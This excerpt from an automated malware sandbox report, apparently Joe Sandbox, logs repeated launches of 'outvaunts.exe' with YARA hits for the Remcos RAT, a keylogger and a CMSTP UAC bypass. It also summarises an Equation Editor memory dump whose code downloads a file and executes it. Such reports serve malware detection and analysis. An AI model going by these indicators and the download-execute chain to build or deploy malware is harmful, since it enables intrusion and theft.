                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:28
                                                    Start time:01:05:15
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    Target ID:29
                                                    Start time:01:05:15
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    Target ID:30
                                                    Start time:01:05:16
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    Target ID:31
                                                    Start time:01:05:16
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    Target ID:32
                                                    Start time:01:05:17
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    Target ID:33
                                                    Start time:01:05:17
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    Target ID:34
                                                    Start time:01:05:18
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    Target ID:35
                                                    Start time:01:05:18
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    Target ID:36
                                                    Start time:01:05:19
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    Target ID:37
                                                    Start time:01:05:20
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    Target ID:38
                                                    Start time:01:05:21
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    Target ID:39
                                                    Start time:01:05:21
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:10.1%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:51%
                                                      Total number of Nodes:104
                                                      Total number of Limit Nodes:3

                                                      Callgraph


                                                      Control-flow Graph

                                                      APIs
                                                      • LoadLibraryW.KERNEL32(035C03C7), ref: 035C03D5
                                                        • Part of subcall function 035C03EF: URLDownloadToFileW.URLMON(00000000,035C0400,?,00000000,00000000), ref: 035C0462
                                                        • Part of subcall function 035C03EF: ShellExecuteExW.SHELL32(0000003C), ref: 035C04CC
                                                        • Part of subcall function 035C03EF: ExitProcess.KERNEL32(00000000), ref: 035C04E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                      • String ID: <
                                                      • API String ID: 2508257586-4251816714
                                                      • Opcode ID: acb405e6523e7e5d710134262fc59b98716de2e8e005ee7d025e1562b2a4cb46
                                                      • Instruction ID: 41994df1281338b5a73760b267789e591a560ef66283f5d84b570bb22a9bf580
                                                      • Opcode Fuzzy Hash: acb405e6523e7e5d710134262fc59b98716de2e8e005ee7d025e1562b2a4cb46
                                                      • Instruction Fuzzy Hash: 6231D2A141D3C5AFC712D3B06CAD6A6BFA47F92108F0E8ACED0860B0F3D668C505C716

                                                      Control-flow Graph

                                                      APIs
                                                      • URLDownloadToFileW.URLMON(00000000,035C0400,?,00000000,00000000), ref: 035C0462
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 035C04CC
                                                      • ExitProcess.KERNEL32(00000000), ref: 035C04E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileProcessShell
                                                      • String ID: <
                                                      • API String ID: 3584569557-4251816714
                                                      • Opcode ID: 37ba51a60fdad5dd0a1149ff8e894f8a0c7cda670b883d4044c3a09a7c9394e0
                                                      • Instruction ID: a9d6413e1ba1620200b2315350285daf0b3b5f6626697ee62ce32a3270a658e9
                                                      • Opcode Fuzzy Hash: 37ba51a60fdad5dd0a1149ff8e894f8a0c7cda670b883d4044c3a09a7c9394e0
                                                      • Instruction Fuzzy Hash: 9551DCA582D3C5AFC712D7B06DA969ABF60BB43508F0D8ACFC4864B0F3D6A8D505C316

                                                      Control-flow Graph

                                                      APIs
                                                      • URLDownloadToFileW.URLMON(00000000,035C0400,?,00000000,00000000), ref: 035C0462
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 035C04CC
                                                      • ExitProcess.KERNEL32(00000000), ref: 035C04E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileProcessShell
                                                      • String ID: <
                                                      • API String ID: 3584569557-4251816714
                                                      • Opcode ID: a66852f5c9915e446062b56caf918945e182ec7432ea87c41f84fcdb0008044b
                                                      • Instruction ID: 7e36079775655479b767fedaf0187fff18d05a2c9122b9c34e714356ddecffc0
                                                      • Opcode Fuzzy Hash: a66852f5c9915e446062b56caf918945e182ec7432ea87c41f84fcdb0008044b
                                                      • Instruction Fuzzy Hash: E841DCA682D3C5AFC712D7B06DA969ABF60BB42108F0D8ACFD4864B0F3D668D505C356

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileProcessShell
                                                      • String ID: <
                                                      • API String ID: 3584569557-4251816714
                                                      • Opcode ID: 1066b5303ae78e2ecfe213613da7084323be4ab0bd8179770c9edc9d3a08161b
                                                      • Instruction ID: 9b65da98696555316a8602819448d50f1e894368b01929f84f22cec11b5873f6
                                                      • Opcode Fuzzy Hash: 1066b5303ae78e2ecfe213613da7084323be4ab0bd8179770c9edc9d3a08161b
                                                      • Instruction Fuzzy Hash: AD3190A281D3C59FC712D7B05CAC696BFA07F92118F0E8ADED0864B0F3E668C405C716

                                                      Control-flow Graph

                                                      APIs
                                                      • URLDownloadToFileW.URLMON(00000000,035C0400,?,00000000,00000000), ref: 035C0462
                                                        • Part of subcall function 035C04AA: ShellExecuteExW.SHELL32(0000003C), ref: 035C04CC
                                                        • Part of subcall function 035C04AA: ExitProcess.KERNEL32(00000000), ref: 035C04E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileProcessShell
                                                      • String ID: <
                                                      • API String ID: 3584569557-4251816714
                                                      • Opcode ID: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
                                                      • Instruction ID: 36bf40fdf5f47609066d2c1ea14302d2b6ce03370c2214554e00fe3b9c9500f2
                                                      • Opcode Fuzzy Hash: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
                                                      • Instruction Fuzzy Hash: 4401F2A541D3C4DFD7A1E7F4E88879BBAE4BFC0218F11085D904A871F3E934C8058605

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExecuteExitProcessShell
                                                      • String ID:
                                                      • API String ID: 1124553745-0
                                                      • Opcode ID: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                                                      • Instruction ID: 8ffa7036b541ba28bc34d1b844c128e0b6a610da2a0890c7b433b35f048837c1
                                                      • Opcode Fuzzy Hash: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                                                      • Instruction Fuzzy Hash: 8701F7D84353C6DFCAF0E6E8F4841EAAA90FA4160CBD8845EA495070F7D524C583861D

                                                      Control-flow Graph

                                                      APIs
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 035C04CC
                                                        • Part of subcall function 035C04DF: ExitProcess.KERNEL32(00000000), ref: 035C04E4
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
